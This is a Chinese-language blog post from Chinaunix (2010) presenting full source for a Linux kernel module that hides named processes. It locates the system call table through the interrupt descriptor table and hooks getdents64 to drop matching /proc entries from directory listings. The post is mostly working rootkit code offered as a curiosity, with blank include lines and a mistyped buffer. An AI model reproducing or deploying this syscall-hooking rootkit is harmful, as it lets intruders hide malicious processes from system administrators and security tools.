Chinaunix首页 | 论坛 | 博客
  • 博客访问: 2052041
  • 博文数量: 610
  • 博客积分: 11499
  • 博客等级: 上将
  • 技术积分: 5511
  • 用 户 组: 普通用户
  • 注册时间: 2008-03-12 19:27
文章分类

全部博文(610)

文章存档

2016年(5)

2015年(18)

2014年(12)

2013年(16)

2012年(297)

2011年(45)

2010年(37)

2009年(79)

2008年(101)

分类: LINUX

2010-06-13 10:11:09

很早以前的小程序,比较简单但是觉得有趣

  原理很简单,Linux查看进程的命令ps是通过系统调用sys_getdents实现,sys_getdents用户获取一个指定路径下的目录条目,实际上就是枚举

  /proc/ 下的pid,这样我们只需要hook一下sys_getdents,把相应的要隐藏的pid信息去掉即可。

  以下是LKM代码,在Linux-2.6.14并运行成功

  #include

  #include

  #include

  #include

  #include

  #include

  #include

  #include

  #define CALLOFF 100

  //使用模块参数来定义需要隐藏的进程名

  char *processname;

  module_param(processname, charp, 0);

  struct {

  unsigned short limit;

  unsigned int base;

  } __attribute__ ((packed)) idtr;

  struct {

  unsigned short off1;

  unsigned short sel;

  unsigned char none,

  flags;

  unsigned short off2;

  } __attribute__ ((packed)) * idt;

  void** sys_call_table;

  asmlinkage long (*orig_getdents)(unsigned int fd, struct linux_dirent64 __user *dirp, unsigned int count);

  char * findoffset(char *start)

  {

  char *p;

  for (p = start; p < start + CALLOFF; p++)

  if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85')

  return p;

  return NULL;

  }

  int myatoi(char *str)

  {

  int res = 0;

  int mul = 1;

  char *ptr;

  for (ptr = str + strlen(str) - 1; ptr >= str; ptr--) {

  if (*ptr < '0' || *ptr > '9')

  return (-1);

  res += (*ptr - '0') * mul;

  mul *= 10;

  }

  return (res);

  }

  struct task_struct *get_task(pid_t pid)

  {

  struct task_struct *p = get_current(),*entry=NULL;

  list_for_each_entry(entry,&(p->tasks),tasks)

  {

  if(entry->pid == pid)

  {

  printk("pid found\n");

  return entry;

  }

  }

  return NULL;

  }

  static inline char *get_name(struct task_struct *p, char *buf)

  {

  int i;

  char *name;

  name = p->comm;

  i = sizeof(p->comm);

  do {

  unsigned char c = *name;

  name++;

  i--;

  *buf = c;

  if (!c)

  break;

  if (c == '\\') {

  buf[1] = c;

  buf += 2;

  continue;

  }

  if (c == '\n') {

  buf[0] = '\\';

  buf[1] = 'n';

  buf += 2;

  continue;

  }

  buf++;

  }

  while (i);

  *buf = '\n';

  return buf + 1;

  }

 int get_process(pid_t pid)

  {

  struct task_struct *task = get_task(pid);

  char *buffer[64] = {0};

  if (task)

  {

  get_name(task, buffer);

  if(strstr(buffer,processname))

  return 1;

  else

  return 0;

  }

  else

  return 0;

  }

  asmlinkage long hacked_getdents(unsigned int fd, struct linux_dirent64 __user *dirp, unsigned int count)

  {

  //added by lsc for process

  long value;

  struct inode *dinode;

  int len = 0;

  int tlen = 0;

  struct linux_dirent64 *mydir = NULL;

  //end

  //在这里调用一下sys_getdents,得到返回的结果

  value = (*orig_getdents) (fd, dirp, count);

  tlen = value;

  //遍历得到的目录列表

  while(tlen > 0)

  {

  len = dirp->d_reclen;

  tlen = tlen - len;

  printk("%s\n",dirp->d_name);

  //在proc文件系统中,目录名就是pid,我们再根据pid找到进程名

  if(get_process(myatoi(dirp->d_name)) )

  {

  printk("find process\n");

  //发现匹配的进程,调用memmove将这条进程覆盖掉

  memmove(dirp, (char *) dirp + dirp->d_reclen, tlen);

  value = value - len;

  }

  if(tlen)

  dirp = (struct linux_dirent64 *) ((char *)dirp + dirp->d_reclen);

  }

  return value;

  }

  void **get_sct_addr(void)

  {

  unsigned sys_call_off;

  unsigned sct = 0;

  char *p;

  asm("sidt %0":"=m"(idtr));

  idt = (void *) (idtr.base + 8 * 0x80);

  sys_call_off = (idt->off2 << 16) | idt->off1;

  if ((p = findoffset((char *) sys_call_off)))

  sct = *(unsigned *) (p + 3);

  return ((void **)sct);

  }

  static void filter_exit(void)

  {

  if (sys_call_table)

  sys_call_table[__NR_getdents64] = orig_getdents;

  }

  static int filter_init(void)

  {

  //得到sys_call_table的偏移地址

  sys_call_table = get_sct_addr();

  if (!sys_call_table) {

  printk("get_act_addr(): NULL...\n");

  return 0;

  } else

  printk("sct: 0x%x\n", (unsigned int)sys_call_table);

  //将sys_call_table中注册的系统调用sys_getdents替换成我们自己的函数hack_getdents

  orig_getdents = sys_call_table[__NR_getdents64];

  sys_call_table[__NR_getdents64] = hacked_getdents;

  return 0;

  }

  module_init(filter_init);

  module_exit(filter_exit);

  MODULE_LICENSE("GPL");

阅读(1775) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~